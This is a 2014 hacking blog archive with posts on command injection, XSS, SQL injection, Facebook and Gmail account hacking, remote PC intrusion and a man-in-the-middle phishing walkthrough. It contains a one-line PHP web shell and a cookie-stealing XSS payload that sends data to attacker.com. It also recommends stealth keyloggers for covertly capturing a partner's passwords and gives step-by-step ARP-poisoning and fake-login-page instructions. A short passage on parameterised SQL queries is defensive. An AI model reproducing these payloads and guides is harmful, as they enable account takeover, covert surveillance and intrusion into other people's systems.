University of Hackers: Hacking

Showing posts with label Hacking. Show all posts

29/12/2014

How to Perform Command Injection Attacks

Introduction: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
How to Perform Command Injection Attacks
In this artick, we will talk about the varieties of command injections and how they can be executed. There are a variety of ways to inject shell commands. Assume for a moment that you have found the page, which takes as an argument a filename as input and executes the shell command "cat" against that file. For example, a semicolon was used to separate out one command form another, to indicate that after the cat command completed, another function should be called in the same line. There are a number of ways to string shell commands together to create new commands.
Here are the common operators you can use, as well as examples of how they might be used in an attack:

Redirection Operators

Examples: <, >>, >
These operators redirect either input or output somewhere else on the server. < will make whatever comes after it standard input. Replacing the filename with < filename will not change the output, but could be used to avoid some filters. > redirects command output, and can be used to modify files on the server, or create new ones altogether. Combined with the cat command, it could easily be used to add unix users to the system, or deface the website. Finally, >> appends text to a file and is not much different from the original output modifier, but again can be used to avoid some simplistic detection schemes.

Pipes

Examples: |
Pipes allow the user to chain multiple commands. It will redirect the output of one command into the next. So you can run unlimited commands by chaining them with multiple pipes, such as cat file1 | grep "string".

Inline commands

Examples: ;, $
This is the original example. Putting a semicolon asks the command line to execute everything before the semicolon, then execute everything else as if on a fresh command line.

Logical Operators

Examples: $, &&, ||
These operators perform some logical operation against the data before and after them on the command line.
Common Injection Patterns & Results
Here are the expected results from a number of common injection patterns (appending the below to a given input string, assuming all quotes are correctly paired:

`shell_command` - executes the command
$(shell_command) - executes the command
| shell_command - executes the command and returns the output of the command
|| shell_command - executes the command and returns the output of the command
; shell_command - executes the command and returns the output of the command
&& shell_command executes the command and returns the output of the command
> target_file - overwrites the target file with the output of the previous command
>> target_file - appends the target file with the output of the previous command
< target_file - send contents of target_file to the previous command
- operator - Add additional operations to target command

These examples are only scratching the surface of possible command injection vectors. The full breadth of attack possibilities is dependent upon the underlying function calls. For instance, if an underlying function is using a shell program such as awk, many more attack possibilities arise than laid out here.
Finally, command injection can be more subtle than finding applications which directly call underlying operating system functions. If it is possible to inject code, say PHP code, then you can also perform command injections. Assume you find an application with a PUT vulnerability on a site which is PHP enabled. An attacker could simply upload a PHP file with a single line to have full access to a shell:

<?php
echo
shell_exec('cat '.$_GET[
'command']);
?>

Thus, it should be noted that many types of attacks, including SQL Injection, have shell injection as an end primary goal to gaining control of the server.

27/12/2014

Top 10 Facebook Hacking Techniques

There are many ways break into a Facebook account, and we have collected the 10 most usual techniques.

1. Phishing

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials. Some Auto liker websites are good examples of phishing. They ask a user to login for access token in order to get username and password of the victim. [Beware]

2. Keylogging

Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealers

Almost 80% people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are softwares specially designed to capture the saved passwords stored in the victims Internet browser.

4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.

5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it's still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying softwares used to monitor a Cellphone. The most popular Mobile Phone Spying softwares are: Mobile Spy and Spy Phone Gold.

7. DNS Spoofing

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

8. USB Hacking

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.

9. Man In the Middle Attack

If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.

10. Botnets

Botnets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.

25/12/2014

HTML Code Injection Technique

Introduction: This article is about HTML injection techniques used to exploit web site vulnerabilities. Nowadays, it's not usual to find a completely vulnerable site to this type of attacks, but only one is enough to exploit it. I'll make a compilation of these techniques all together, in order to facilitate the reading and to make it entertaining. HTML injection is a type of attack focused upon the way HTML content is generated and interpreted by browsers at client side. Otherwise, JavaScript is a widely used technology in dynamic web sites, so the use of techniques based on this, like injection, complements the nomenclature of 'codeinjection'.

Code Injection

This type of attack is possible by the way the client browser has the ability to interpret scripts embedded within HTMLcontent enabled by default, so if an attacker embeds script tags such <SCRIPT> , <OBJECT> , <APPLET> , or <EMBED> into a web site, the web browser's JavaScript engine will execute it. Typical targets of this type of injection are forums, guestbooks, or whatever section where the administrator allows the insertion of text comments; if the design of the web site isn't parsing the comments inserted, and takes < or > as real chars, a malicious user could type:

I like this site because <script>alert('Injected!');</script> teaches me a lot

If it works and you can see the message box, the door is opened to the attacker's imagination limits! A common code insertion used to drive navigation to another website is something like this:

<H1> Vulnerability test </H1> <METAHTTP-EQUIV="refresh"CONTENT="1;url= http://www.test.com">

Same within a
<FK> or <LI> tag:

<FKSTYLE="behavior: url(http://<<Other website>> ;">

Other tags used to execute malicious JavaScript code are, for example, <BR> , <DIV> , even background-image:

<BRSIZE="&{alert('Injected')}"><DIVSTYLE="background-image: url(javascript:alert('Injected'))">

The <title> tag is a common weak point if it's generated dynamically. For example, suppose this situation:

If you build title as 'example </title> </head> </body><img src= http://myImage.png>' HTML resulting would insert the 'myImage.png' image first of all:

<HTML>
<HEAD>
<TITLE>
example
</TITLE>
</HEAD>
<BODY><imgsrc= http://myImage.png></TITLE> </HEAD> <BODY>...
</BODY>
</HTML>

There is another dangerous HTML tag that could exploit a web browser's frames support characteristic: <IFRAME> This tag allows (within Sandbox security layer) cross-scripting exploiting using web browser elements (address bar or bookmarks, for example), but this theme is outside the scope of this article.

22/12/2014

SQL Injection: SQL for Web Pages

SQL in Web Pages

When SQL is used to display data on a web page, it is common to let web users input their own search values. Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data: Server Code

txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " txtUserId;

The example above, creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page. The rest of this chapter describes the potential dangers of using user input in SQL statements.

SQL Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input. Injected SQL commands can alter SQL statement and compromise the security of a web application.

SQL Injection Based on 1=1 is Always True

Look at the example above, one more time. Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id. If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this: UserId: 105 or 1=1 Server Result
SELECT * FROM Users WHERE UserId = 105 or 1=1 The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true. Does the example above seem dangerous? What if the Users table contains names and passwords? The SQL statement above is much the same as this:

SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1

A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.

SQL Injection Based on ""="" is Always True

Here is a common construction, used to verify user login to a web site:
User Name:
Password:
Server Code

uName = getRequestString("UserName"); uPass = getRequestString("UserPass"); sql = "SELECT * FROM Users WHERE Name ='" uName "' AND Pass ='" uPass "'"

A smart hacker might get access to user names and passwords in a database by simply inserting " or ""=" into the user name or password text box. The code at the server will create a valid SQL statement like this: Result

SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""

The result SQL is valid. It will return all rows from the table Users, since WHERE ""="" is always true.

SQL Injection Based on Batched SQL Statements

Most databases support batched SQL statement, separated by semicolon. Example

SELECT * FROM Users; DROP TABLE Suppliers

The SQL above will return all rows in the Users table, and then delete the table called Suppliers. If we had the following server code: Server Code

txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;

And the following input:

User id: 105; DROP TABLE Suppliers

The code at the server would create a valid SQL statement like this: Result

SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers

Parameters for Protection

Some web developers use a "blacklist" of words or characters to search for in SQL input, to prevent SQL injection attacks. This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks), are used in common language, and should be allowed in many types of input. In fact it should be perfectly legal to input an SQL statement in a database field. The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters. SQL parameters are values that are added to an SQL query at execution time, in a controlled manner. ASP.NET Razor Example

txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = @0"; db.Execute(txtSQL,txtUserId);

Note that parameters are represented in the SQL statement by a @ marker. The SQL engine checks each parameter to ensure that it is correct for its column and are treated literally, and not as part of the SQL to be executed. Another Example

Examples The following examples shows how to build parameterized queries in some common web languages.
ASP.NET SELECT

txtUserId = getRequestString("UserId"); sql = "SELECT * FROM Customers WHERE CustomerId = @0"; command = new SqlCommand(sql); command.Parameters.AddWithValue("@0",txtUserID); command.ExecuteReader();

ASP.NET INSERT INTO

txtNam = getRequestString("CustomerName"); txtAdd = getRequestString("Address"); txtCit = getRequestString("City"); txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)"; command = new SqlCommand(txtSQL); command.Parameters.AddWithValue("@0",txtNam); command.Parameters.AddWithValue("@1",txtAdd); command.Parameters.AddWithValue("@2",txtCit); command.ExecuteNonQuery();

PHP INSERT INTO

$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City) VALUES (:nam, :add, :cit)"); $stmt->bindParam(':nam', $txtNam); $stmt->bindParam(':add', $txtAdd); $stmt->bindParam(':cit', $txtCit); $stmt->execute();

17/12/2014

10 Most Popular Ways Hackers Hack Your Website

Here are the 10 most popular ways they can threaten the security of your site.

1. Injection Attacks

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or injections, unknowingly. In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data. Technical Injection Attack Example: An Injection Attack could have this command line:

String query = “SELECT * FROM accounts WHERE custID='” request.getParameter( “id”) ”‘”;

The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ‘1’=’1 This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

2. Cross Site Scripting Attacks

XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate. For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info. Technical Cross Site Scripting Example:

(String) page = “<input name=’creditcard’ type=’TEXT’ value='” request.getParameter( “CC”) “‘>”;

The attacker modifies the CC parameter in their browser to:

‘><script>document.location=’ http://www.attacker.com/cgi-bin/cookie.cgi?foo=’document.cookie</script>’

This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session. That means the hacker has access to the website admin credentials and can take complete control over it.

3. Broken Authentication and Session Management Attacks

If the user authentication system of your website is weak, hackers can take full advantage. Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid). If a hacker exploits the authentication and session management system, they can assume the user’s identity.

Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:

*. Are user credentials weak? *. Can credentials be guessed or overwritten through weak account management functions? *. Are session IDs exposed in the URL? *. Are session IDs vulnerable to session fixation attacks? *. Do session IDs timeout and can users log out? If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

4. Clickjacking Attacks

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing. Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be. For example, using a carefully crafted combination of style sheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker. Clickjacking Example: Here’s a live, but safe example of how clickjacking works: [CLICK HERE TO SEE EXAMPLE]

5. DNS Cache Poisoning

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic” Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server. This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path. In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

6. Social Engineering Attacks

A social engineering attack is not technically a “hack” It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website. The problem, of course, is that you’re not getting into what you think you’re getting into. A classic example of a social engineering attack is the “Microsoft tech support” scam. This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course. Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

7. Symlinking: An Insider Attack

A symlink is basically a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not. If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions. In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

8. Cross Site Request Forgery Attacks

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information. In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account. This is why websites ask you to log out of your account when you’re finished, it will expire the session immediately. In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker. A Cross Site Attack Examples:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
<img src=”>span  style=”color: red;”>
http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />

In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

9. Remote Code Execution Attacks

A Remote Code Execution attack is a result of either server side or client side security weaknesses. Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information. The following vulnerable components were downloaded 22 million times in 2011: Apache CXF Authentication Bypass

(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)

By failing to provide an identity token, attackers could invoke any web service with full permission.

10. DDoS Attack: Distributed Denial Of Service Attack

DDoS or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users. And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage. It’s kind of like having your car stolen when you really need to get somewhere fast. The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system. The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time. This causes bottlenecking at the server side because the CPU just ran out of resources. Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

12/12/2014

Top 10 Most Hacking Techniques and Tools

We timely provides you hacking techniques, methods and tutorials, so that you can understand how hackers gain access into your networks, websites, computers etc.
Here I have listed the top 10 most popular tools used in hacking. It is advisable to master these tools to learn Cyber security.

Read Also:-Hack Any Remote PC By IP Address Using Kali Linux

1. Nmap

Nmap is also known as the swiss army knife of hacking. It is the best port scanner with a lot of functions. In hacking, Nmap is usually used in the footprinting phase to scan the ports of the remote computer to find out wich ports are open.

2. WireShark

Not to be confused with WireLurker? WireShark is a packet sniffer. It captures all network traffic going through a network adapter. When performing man in the middle attacks using tools like Cain, we can use Wireshark to capture the traffic and analyze it for critical info like usernames and passwords. It is used by network administrators to perform network troubleshooting.

Read Also:-Hacking Facebook Using Man in the Middle Attack

3. Cain and Abel

Cain and Abel is a multipurpose windows only hacking tool. It is a bit old now, but it still does the job well. Cain can be used to crack windows password, perform man in the middle attacks, capture network passwords etc.

4. Metasploit

Metasploit is a huge database of exploits. There are thousands of exploit codes, payloads that can be used to attack web servers or any computer for that matter. This is the ultimate hacking tool that will allow a hacker to actually hack a computer. A hacker will be able to get root access to the remote computer and plant backdoors or do any other stuff. It is best to use metasploit under linux.

5. Burp Suite

Burp suite is a web proxy tool that can be used to test web application security. It can brute force any login form in a browser. You can edit or modify GET and POST data before sending it to the server. It can also be used to automatically detect SQL injection vulnerabilities. It is a good tool to use both under Windows and Linux environments.

6. Aircrack-ng

Aircrack-ng is a set of tools that are used to crack wifi passwords. Using a combination of the tools in aircrack, you can easily crack WEP passwords. WPA passwords can be cracked using dictionary or brute force. Although aircrack-ng is available for Windows, it is best to use it under Linux environment. There are many issues if you use it under Windows environment.

7. Nessus

Nessus is a comprehensive automatic vulnerability scanner. You have to give it an IP address as input and it will scan that IP address to find out the vulnerabilities in that system. Once you know the vulnerabllities, you can use metasploit to exploit the vulnerablity. Nessus works both in Windows and Linux.

8. THC Hydra

Hydra is a fast password cracker tool. It cracks passwords of remote systems through the network. It can crack passwords of many protocols including ftp,http, smtp etc. You have the option to supply a dictionary file which contains possible passwords. It is best to use hydra under linux environment.

9. Netcat

Netcat is a great networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is also known as the swiss army knife for TCP/IP. This is because netcat is extremely versatile and can perform almost anything related to TCP/IP. In a hacking scenario, it can be used as a backdoor to access hacked computers remotely. The use of netcat is limited only by the user's imagination.

10. Putty

Although putty is not a hacking software by itself, it is a very useful tool for a hacker. It is a client for SSH and telnet, which can be used to connect to remote computers. You may use putty when you want to connect to your Backtrack machine from your Windows PC. It can also be used to perform SSH tunneling to bypass firewalls.
Note: This list is not comprehensive. There are many tools that I have left out. Those tools that did not make the list are; Sqlmap, Havij, Acunetix Web Scanner

02/12/2014

How to Hack a Gmail Password: Gmail Hacking Secrets

With Gmail being one of the most widely used email services across the globe, it has also become a favorite place for many to engage in secret relationships and exchange cheating messages.

Read Also:-How to Use Ravan for Cracking Password

Therefore, in order to reveal the secret, it becomes inevitable for people to hack the Gmail password of their loved ones.

Possible Ways to Hack Gmail Password

Today, most websites on the Internet give out false or outdated password hacking methods that completely mislead the readers. I have also seen a few top ranking websites making false promises to hack any Gmail password and urge users to take-up surveys. Remember, this is just a honeypot setup by the website owner only to earn money where no Gmail password will be delivered to users upon survey completion. However, on this blog we strive hard to present readers with true and accurate information that actually work. With many years of my experience in the field of information security, I can tell you that the following are the only two ways to hack Gmail password.

1. Keylogging

Easiest Way to Hack Gmail Password Keylogging is by far the easiest way to gain access to any Gmail account. Keylogging involves the use of a small software program called the keylogger. This keylogger when installed on a given computer will capture each and every keystroke typed on the keyboard including all types of passwords.
Does a Keylogger Require Any Special Knowledge?
No, absolutely not! Keyloggers are designed in such a way that even the first time users also find it easy to install and control. Anyone with a basic knowledge of computer can use it with ease.
Is it Possible to Detect a Keylogger?
Right after the installation process is completed, the keylogger goes completely hidden and continues to work in the background. Hence, it is impossible for the users of the computer to know about its presence.
What if I do not have Physical Access to the Target Computer?
Well, you need not worry as I am going to suggest one of the best keylogger program that supports installation on a local computer as well as a remote computer. I recommend the Realtime-Spy keylogger as the best
Realtime-Spy: I'm not going to give you the direct downloading link of Realtime-Spy otherwise i'll be considered as a present hacker, you can download it internet.
Top Features of Realtime-Spy:

*. REMOTE AND LOCAL INSTALLATION
The product supports installation on remote as well as a local computer.
*. EXTREMELY EASY TO INSTALL
Realtime-Spy is very small in size and can be installed with just a click of a button.
*. NEVER GET CAUGHT
This product runs in a total stealth mode so that you need not worry about being caught or traced back.
*. ACCESS ANY PASSWORD
This product can be used to hack Gmail or any other online password.
*. WORKS ON WINDOWS AND MAC
Fully compatible with Windows XP/Vista/7/8 (32 and 64-bit) and Mac.
You get a detailed step-by-step instruction and technical support after your purchase. So, go grab Realtime-Spy now and expose the truth.

What About Mobile Devices?

For cell phone devices, there is a mobile version of the same program called mSpy which you can download from the internet.
Supported Devices: Android, Windows Mobile, BlackBerry, iPhone and iPads.

2. Phishing

Difficult Way for begginers, Phishing is a way to capture sensitive information such as usernames, passwords and credit card details. Phishing usually involves the use of a spoofed web page (or a fake website) whose look and feel is almost identical to that of the legitimate websites like Gmail, Yahoo and Hotmail. When the users try to login from these fake pages and enter their passwords there, the login details are stolen away by the hacker.
However, creating a fake login page and taking it online to successfully hack the password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. In addition to that, carrying out a phishing attack is a serious criminal offence. So, if you are new to the concept of hacking passwords, then I only recommend using the keyloggers as they are the easiest the safest way to hack Gmail or any online password.

30/11/2014

How to Connect to Protected Wi-Fi Hotspots for Free Without Any Passwords

Depending on who you ask, internet connectivity should be a basic human right. With Google recently embarking on a project to provide internet capabilities to remote corners of the world using balloons and satellites while Facebook attempts to do the same with unmanned drones, the concept of free web access is steadily gaining steam. It's this train of thought that sparked the idea for a new crowd-sourced database of Wi-Fi access point passwords. The service uses an app called Instabridge to allow users to share passwords for Wi-Fi networks that they've connected to, then provides a map of all of these access points to other users.

Read Also:-Fern WiFi Cracker

Instabridge relies on user submissions to grow its list of connections, and thousands of network credentials have already been submitted. So if you're ready to join in the fun, I'll review the app in detail below.

Recommended Post:-How to Increase Wifi Signal Strength

1. Install Instabridge Instabridge- is available for free on the Google Play Store, but it is also available for Mac and Windows computers.
2. Set Up Your Preferences. When you first launch Instabridge, you'll have to go through a one-time setup process. First, tap I am new then review and Accept the Terms of Service.
Next, Instabridge will ask you to verify your phone number. This is done so that your friends will be able to find you and connect to your shared Wi-Fi networks, but it is not required. If you'd rather not share your phone number, hit Skip. Otherwise, hit OK.
If you opted to verify your phone number, a text message will be sent to your phone and Instabridge will automatically detect it. Once that has happened, a button will show up in the upper right-hand corner where you can hit Done.
Next, you'll be given a chance to review your settings. From here, you can set your phone to automatically connect to My own networks, Friend Networks (networks shared with you by friends), and Community Networks (networks shared by other users). The last two options help improve the Instabridge network and app, so leave them turned on and press the Done button up top.
3. Add Your Wi-Fi Networks. If you are connected to a Wi-Fi access point when setup has finished, the app will automatically ask if you would like to save and share the login credentials for that network. If you are not currently connected, you can get to this same interface at a later time from the app's main screen. Under the Networks you can connect to field, you will see your current Wi-Fi connection. Tap the Share or backup this hotspot button to begin. Enter your password on the following screen, then hit Next. From here, tap the Share with field then select who you'd like to share this Wi-Fi connection's password with. If it's a public access point, feel free to contribute to the cause and share the password with All Users. Otherwise, if this is your home network, it would be best to choose either Friends or Just me, no one else for security reasons. With the Friends option, you'll be given a chance to select which friends to share this connection information with. They will need to have the app installed on their device to connect to your network. You can view the amount of times that other users have connected to networks that you've shared by tapping the second tab from the app's home screen.
4. Connect to Free Wi-Fi Networks Instabridge makes it easy to discover free Wi-Fi connections in your area. From the app's main screen, simply tap the third tab (the one with the Earth icon) to begin. Grey dots represent public Wi-Fi connections that require payment or restrict access in some regard. Pink dots mark free, open Wi-Fi connections that are available for you to use. Tap any of the dots, and you'll be taken into Google Maps so that you can navigate to within range of the signal. When you're ready to connect to one of these networks, simply tap it from Networks you can connect to field on the app's main screen, and connection will occur automatically.

Love this article?

Share it with your friends on Facebook

28/11/2014

Hack Any Remote PC By IP Address Using Kali Linux

This is how we can get the IP address of the victims website. How about your friend’s PC? You can’t do www.yourfirend’ sname.com, can you? Finding your friend’s IP address is a little tough job, for you and tougher it is if he has dynamic IP address that keeps changing. But in our case, Finding friend’s/victim's IP address is as easy as A, B, C.
I'll show you one of the widely used method to detect IP address of your friend is by chatting with him or go through Find someone's IP address! in order to get IP address.
Now you got the IP address right? Is it online? To know the online status just ping the IP address, if it is online it will reply. If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily. Use Advanced Port Scanner to scan all open and venerable ports.

Read Also:-Hack Into Emails And Facebook Using Kali Linux

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > Add windows components. Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port].

You’ll be asked to input login information.

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like Brutus, THC- Hydra In this way you’ll able to hack remove computer using only IP address.

Love this article?

Share it with your friends on Facebook

20/11/2014

How Hackers Hack Bank Accounts and Personal Information

Most people learning hacking always have a keen interest in knowing that how they can hack bank accounts of other people. But most of them find it pity much difficult such that now they have made a perception that bank account information like credit cards or debit cards or net banking passwords cannot be hacked. Its truth to an extent that hacking Banking account information and credit or debit cards passwords is most difficult and almost impossible part. Today i will discuss with you why hacking bank account information is tough and always considered as impossible task. We will also discuss the different methods that hackers use to hack bank account information nowadays.

Recommend Post What Is Keylogger And How To Be Safe From Keyloggers

I am quite sure that almost everybody using internet nowadays uses that internet to pay online bills, book reservation tickets, purchase online things or simply transfer money i.e. involved in at least some kind of online transaction that is related to money i.e. banking information, credit or debit card payments or simply Net banking. Most of banks uses SSL (Secured Sockets Layer) connection and at least 128 or 256 bit encryption for online banking and transaction purposes. Also now an extra layer of security is introduced that is called transaction PIN layer means for each and every online transaction you have to enter your passwords and during transaction you have to enter PIN (a type of password that varies 4 to 8 chars in length). Thus bank do alot of work to protect your secret information and credentials from the eyes of the world that may wish to gain access to your such a vital information.
Below example will illustrate you how powerful the encryption method is:
* . 40 bit encryption, means there are 2^40 possible keys that could fit into the lock that holds your account information. That means there are many billions of possible keys that means brute forcing such thing is imposable. Only thing now left is dictionary and rainbow attack. But its not only the security measure that banks used to secure there information. Also its only 40 bit encryption.
* . 128 bit encryption means there are 2^88 times as many as key combinations that are being possible for 40 bit encryption. That means a computer would require exponentially more processing power and time than for 40-bit encryption to find the correct key. That's a very powerful method of encrypting data sent from your machine to bank machine. But unfortunately it's all is useless to you once your system has been compromised or hacked. Now How these all security Encryption can be bypassed and your system can be compromised online. There are several methods for exploiting and bypassing such account information Some of them are:

1. Phishing

2. Trojans

3. Session Hijacking

Warning: This blog contains materials that can be potentially damaging or dangerous. If you are looking to comment a crime, you must leave this site now! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational, public awareness and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this blog nor the author(s) of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions.
We http://deadlyuniversityspy.blogspot.com/ are providing a lot of hacking tutorials, methods to crack passwords and other similar stuffs in order to develop hackers attitude to learn self defence from Computer Criminals attack and to detect the ways in which hackers can infiltrate your system.

Love this article?

Share it with your friends on Facebook

17/11/2014

Hacking Facebook Using Man in the Middle Attack

Before i take you to the main point, let's understand Man in the Middle Attack.

So What is Man in the Middle Attack?

An attack where a user gets between the sender and receiver of information and sniffs any information being sent. In some cases, users may be sending unencrypted data, which means the man-in-the-middle (MITM) can obtain any unencrypted information. In other cases, a user may be able to obtain information from the attack, but have to unencrypt the information before it can be read. In the picture below is an example of how a man-in-the-middle attack works. The attacker intercepts some or all traffic coming from the computer, collects the data, and then forwards it to the destination the user was originally intending to visit.

Read Also Seven Most Common Password Cracking Methods And Their Countermeasures

In this tutorial Hacking Facebook Using Man in the Middle Attack I will demonstrate how to hack Facebook using MITM (Man in the Middle). This attack usually happen inside a Local Area Network (LAN) in office, internet cafe, apartment and so on. Below is the step by step guide how MITM work, and how it can be happen to do hacking a Facebook account. In this guide, the attacker act as the third person attacker will manipulate the switch routing table so the victim will think that attacker is a Web server and vice versa, because the attacker has changed the routing table. For this tutorial we need to prepare the tools to do Proof of Concept about this tutorial. Below are some tools you need to download.
1. XAMPP–APACHE PHP MySQL
2. Cain & Abel (We use it for Man in the Middle Attack).
3. Facebook Offline Page (I have nulled the code, so this script will not contact Facebook when victim accessed fake Facebook page Download Facebook Offline Page
Update: Replace your index.php and login.php using following files. Download Here

Step by step Hacking Facebook Using Man in the Middle Attack


Attacker IP Address:
 XXX.XXX.XXX.XXX


Victim IP Address:
 XXX.XXX.XXX.62


Fake Web Server:
 XXX.XXX.XXX.XXX

Note: For Security reasons, i can't type my IP Address So, you need to replace the X with your own IP and your victim's as well.
I assume you’re in a Local Area Network now.
1. Install the XAMPP and run the APACHE and MySQL service
2. Extract the fb.rar and copy the content to C:\xampp\htdocs
3. Check the fake web server by open it in a web browser and type http://localhost/
4. Install Cain & Abel and do the APR (ARP Poisoning Routing), just see the step by step how to below Click the start/stop sniffer Choose your interface for sniffing and click OK. When it’s finish, click again the Start/Stop Sniffer to activate the sniffing interface. Go to the Sniffer tab and then click the Select "All hosts in my subnet" and Click OK.
You will see the other people in your network, but your target is XXX.XXX.XXX.62 After we got all of the information, click at the bottom of application the APR tab. Click the button, and follow the instruction below.
